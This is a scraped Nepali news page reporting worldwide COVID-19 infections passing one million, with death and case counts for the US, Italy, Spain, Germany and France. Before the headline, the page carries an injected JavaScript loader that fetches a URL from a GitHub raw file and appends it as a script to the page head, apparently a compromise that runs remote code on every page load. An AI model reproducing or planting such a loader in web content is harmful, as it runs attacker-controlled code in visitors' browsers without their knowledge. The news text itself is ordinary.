;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); कोरोना संक्रमित १० लाख नाघ्यो, ५३ हजार २ सय बढीको मृत्यु – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • कोरोना संक्रमित १० लाख नाघ्यो, ५३ हजार २ सय बढीको मृत्यु
अन्तर्राष्ट्रिय

कोरोना संक्रमित १० लाख नाघ्यो, ५३ हजार २ सय बढीको मृत्यु

२१ चैत,

काठमाडौं । कोरोना नेपाल लाइभका  अनुसार कोरोना भाइरस (कोभिड–१९) संक्रमितको संख्या विश्वभर १० लाख नाघेको छ । यस्तै ५३ हजार २  सय १८  जनाको मृत्यु भएको छ ।

अमेरिकामा सबैभन्दा धेरै २ लाख ४५ हजार १ सय ९३ जनामा संक्रमण पुष्टि भएको छ । यसैगरी इटालीमा १ लाख १५ हजार २ सय ४२ र स्पेनमा १ लाख १२ हजार ६५ जना संक्रमित छन् । जर्मनीमा संक्रमितको संख्या ८४ हजार ७ सय ९४ छ ।

मृतकको संख्या भने इटलीमा धेरै छ । इटलीमा कोरोना भाइरसको संक्रमणबाट १३ हजार ९ सय १५ जनाको मृत्यु भएको छ ।

स्पेनमा १० हजार ३ सय ४८ र फ्रान्समा ५ हजार ३ सय ८७ जनाको मृत्यु भएको छ ।

फेसबुक प्रतिक्रियाहरु